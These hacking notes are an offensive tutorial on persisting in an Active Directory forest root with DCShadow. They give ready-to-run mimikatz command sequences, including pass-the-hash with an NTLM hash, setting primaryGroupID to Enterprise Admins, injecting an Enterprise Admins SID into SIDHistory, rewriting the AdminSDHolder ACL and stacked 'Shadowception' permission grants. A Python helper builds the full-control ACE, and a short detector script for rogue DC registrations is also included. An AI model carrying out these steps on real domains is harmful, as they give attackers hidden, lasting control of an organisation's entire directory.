Hacking Notes

We are going to discuss some ways to establish persistence in a forest root domain.

DCShadow

DCShadow temporarily registers a rogue domain controller in the target domain and uses replication to push attribute changes (SID History, SPNs, security descriptors and more) onto a chosen object, without leaving the usual change logs for the modified object.

The rogue DC is registered by creating a server object (with its nTDSDSA child) in the configuration container, adding DC-style SPNs to an existing computer object, and starting the RPC server that implements the directory replication service (DRSUAPI).

Because the legitimate DC receives the attributes as replicated data from what looks like another DC, it does not record them as a local modification of the target object. The registration itself (the new SPNs and the objects created in the configuration container) is still visible, and that is what defenders hunt for.

By default, Domain Admin privileges are required to use DCShadow.
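The registration artifacts described above are what a defender can look for. The following is an added Python example, not code from this page, that runs such a check over a small constructed directory snapshot: it flags computer objects outside the Domain Controllers OU that carry the GC/ or DRS-interface SPNs a DC normally has, and nTDSDSA server objects in the configuration container that have no matching real DC. The host names, DNs and GUIDs in it are made up.

```python
import re

# Constructed sample data (not from a real domain) in the shape an LDAP export
# would give: computer objects with their servicePrincipalName values, and the
# nTDSDSA objects representing registered DCs under CN=Sites,CN=Configuration.
# UUID of the DRS RPC interface; DCShadow adds it as an SPN prefix on the fake DC.
DRS_IFACE_UUID = "E3514235-4B06-11D1-AB04-00C04FC2DCD2"

COMPUTERS = [
    {"dn": "CN=DC01,OU=Domain Controllers,DC=corp,DC=local",
     "servicePrincipalName": [
         "HOST/dc01.corp.local",
         "GC/dc01.corp.local/corp.local",
         "E3514235-4B06-11D1-AB04-00C04FC2DCD2/0f3a2b1c-1111-4a2b-9c3d-000000000001/corp.local",
     ]},
    {"dn": "CN=WS07,OU=Workstations,DC=corp,DC=local",  # workstation posing as a DC
     "servicePrincipalName": [
         "HOST/ws07.corp.local",
         "GC/ws07.corp.local/corp.local",
         "E3514235-4B06-11D1-AB04-00C04FC2DCD2/0f3a2b1c-2222-4a2b-9c3d-000000000002/corp.local",
     ]},
    {"dn": "CN=WS08,OU=Workstations,DC=corp,DC=local",
     "servicePrincipalName": ["HOST/ws08.corp.local"]},
]

NTDSDSA = [
    "CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local",
    "CN=NTDS Settings,CN=WS07,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local",
]


def rdn_name(dn):
    """First RDN value of a DN, e.g. 'DC01' from 'CN=DC01,OU=...'."""
    m = re.match(r"^CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else ""


def in_dc_ou(dn):
    """True when the object lives in the Domain Controllers OU."""
    return ",ou=domain controllers," in dn.lower()


def dc_style_spns(spns):
    """SPNs that only a DC/GC should carry: GC/... and the DRS interface UUID."""
    return [s for s in spns if s.split("/", 1)[0].upper() in ("GC", DRS_IFACE_UUID)]


def suspicious_spn_hosts(computers):
    """Computers outside the Domain Controllers OU that carry DC-style SPNs."""
    return [rdn_name(c["dn"]) for c in computers
            if not in_dc_ou(c["dn"]) and dc_style_spns(c.get("servicePrincipalName", []))]


def ntdsdsa_server(dn):
    """'WS07' from 'CN=NTDS Settings,CN=WS07,CN=Servers,...'."""
    m = re.match(r"^CN=NTDS Settings,CN=([^,]+),CN=Servers,", dn, re.IGNORECASE)
    return m.group(1) if m else ""


def rogue_replication_servers(ntdsdsa_dns, computers):
    """Registered replication servers with no computer object in the DC OU."""
    legit = {rdn_name(c["dn"]).upper() for c in computers if in_dc_ou(c["dn"])}
    servers = [ntdsdsa_server(dn) for dn in ntdsdsa_dns]
    return [s for s in servers if s and s.upper() not in legit]


if __name__ == "__main__":
    print("DC-style SPNs on non-DC computers:", suspicious_spn_hosts(COMPUTERS))
    print("nTDSDSA objects without a real DC:", rogue_replication_servers(NTDSDSA, COMPUTERS))
```

Mimikatz removes the SPNs and the configuration objects again once the push is done, so a periodic snapshot like this can miss a short-lived registration; in practice it is paired with event-based detection of the same artifacts (changes to the computer object's SPNs and object creation under CN=Sites,CN=Configuration).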

To execute this persistence we need two instances of mimikatz. The first runs as SYSTEM on the machine that will pose as the DC (!+ loads the mimikatz driver and !processtoken takes a SYSTEM token), starts the RPC server and specifies the attribute to modify:

!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow"

The second, running in a context with enough privileges (Domain Admin here, obtained via pass-the-hash), triggers the replication that pushes the values:

privilege::debug
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /impersonate
lsadump::dcshadow /push

Note: DCShadow can be used with minimal permissions by modifying ACLs; Nishang has a script (Set-DCShadowPermissions) that grants the required permissions to a user.

Set-DCShadowPermissions -FakeDC machine-user01 -SAMAccountName root1user -Username user01 -Verbose

Set Primary Group ID to Enterprise Admins

Now that we know how to overwrite user attributes, we can change a user's primaryGroupID to the RID of Enterprise Admins (519) or Domain Admins (512).

lsadump::dcshadow /object:user01 /attribute:primaryGroupID /value:519

Note: This is noisy, because anyone who runs net group "Enterprise Admins" /domain will see user01 listed as a member.

Change SIDHistory of a user

We can add the SID of the Enterprise Admins group to a user's SIDHistory in order to obtain full control of the forest; the user then carries that SID in its access token without appearing as a member of the group.

lsadump::dcshadow /object:user /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519

Modify ntSecurityDescriptor for AdminSDHolder

We can modify the ntSecurityDescriptor for AdminSDHolder to add full control for a user.

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=corp,DC=local")).psbase.ObjectSecurity.sddl

We take the SDDL returned above and append a full-control ACE, copied from the Domain Admins (DA) ACE, with our user's SID as the trustee.

lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=corp,DC=local /attribute:ntSecurityDescriptor /value:<MODIFIED ACL>

Modified ACL:

ORIGINAL ACL + FULL CONTROL FOR OUR USER (placeholder SID below, replace it with the real one)
....(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-560323961-2315414123-15432421423-1323)

Note: the new ACE is the same ACE string that SY/BA/DA already have, only with our user's SID as the trustee. To find that SID we can use:

Get-NetUser user01
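Building the modified ACL by hand is error-prone, so here is an added Python example (not code from this page) that does what the section describes: it takes an SDDL string as returned by the DirectoryEntry one-liner, clones the allow ACE granted to DA with our user's SID as trustee, validates the SID, and appends the ACE to the DACL (before the SACL, if there is one). The shortened AdminSDHolder SDDL and the user SID in it are constructed placeholders.

```python
import re

# Constructed values (not from a real domain): a shortened AdminSDHolder SDDL in the
# shape the DirectoryEntry one-liner returns, and a placeholder SID for "our" user.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;LCRPLORC;;;AU)"
    "(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)"
    "(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;DA)"
    "(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;SY)"
)
OUR_USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1323"
FULL_CONTROL = "CCDCLCSWRPWPLOCRSDRCWDWO"  # rights string carried by the DA/BA/SY ACEs

ACE_RE = re.compile(r"\(([^()]*)\)")


def valid_sid(sid):
    """S-1-<authority>-<sub>[-<sub>...]; every sub-authority is a 32-bit unsigned int."""
    m = re.fullmatch(r"S-1-\d+((?:-\d+)+)", sid)
    if not m:
        return False
    subs = [int(x) for x in m.group(1).split("-")[1:]]
    return 1 <= len(subs) <= 15 and all(s <= 0xFFFFFFFF for s in subs)


def dacl_aces(sddl):
    """ACE strings of the DACL: the part after 'D:' and before any 'S:' (SACL)."""
    d = sddl.find("D:")
    if d < 0:
        raise ValueError("SDDL has no DACL")
    body = sddl[d:]
    s = body.find("S:")
    if s >= 0:
        body = body[:s]
    return ACE_RE.findall(body)


def trustee(ace):
    """Sixth ACE field: the account SID or its two-letter SDDL alias."""
    return ace.split(";")[5]


def add_full_control_ace(sddl, sid):
    """Append an allow ACE mirroring the Domain Admins ACE but naming `sid`."""
    if not valid_sid(sid):
        raise ValueError("malformed SID: " + sid)
    aces = dacl_aces(sddl)
    if any(trustee(a) == sid for a in aces):
        return sddl  # already present; pushing it again changes nothing
    # DA shows up as the alias "DA" or as the domain SID with RID 512.
    da = [a for a in aces if a.startswith("A;")
          and (trustee(a) == "DA" or trustee(a).endswith("-512"))]
    fields = da[0].split(";") if da else ["A", "", FULL_CONTROL, "", ""]
    new_ace = "(" + ";".join(fields[:5] + [sid]) + ")"
    # Keep the SACL last: insert before 'S:' when present, else append.
    s = sddl.find("S:", sddl.find("D:"))
    if s < 0:
        return sddl + new_ace
    return sddl[:s] + new_ace + sddl[s:]


if __name__ == "__main__":
    print(add_full_control_ace(SAMPLE_SDDL, OUR_USER_SID))
```

The resulting string is what goes into the /value: argument of lsadump::dcshadow; pushing it replaces the whole ntSecurityDescriptor, so the original ACEs must be carried over unchanged, which is why the function edits the string it was given rather than building a new one.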

Shadowception

We can even run DCShadow from DCShadow: use a DA session once to push the ACEs that grant a low-privileged user the rights DCShadow needs, so later pushes no longer require DA. The current SDDL of each object to modify can be read as before, for example for the domain object:

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=corp,DC=local")).psbase.ObjectSecurity.sddl

Note: /stack queues a change without starting the server, so all four modifications can be stacked in one instance and pushed together.

The objects to modify, with the rights Nishang's Set-DCShadowPermissions grants on each:

Domain Object: DS-Install-Replica, DS-Replication-Manage-Topology and DS-Replication-Synchronize

Attacker Computer Object (the machine registered as the fake DC): WriteProperty

Target User Object: WriteProperty

Sites Configuration Object (CN=Sites,CN=Configuration and its children): CreateChild and DeleteChild

Each ACE is pushed against the object's ntSecurityDescriptor with lsadump::dcshadow /object:<DN> /attribute:ntSecurityDescriptor /value:<MODIFIED ACL> /stack, as in the AdminSDHolder example.

Finally we start the server, which serves all the stacked changes:

lsadump::dcshadow

And in the other session, with DA privileges, we push them:

lsadump::dcshadow /push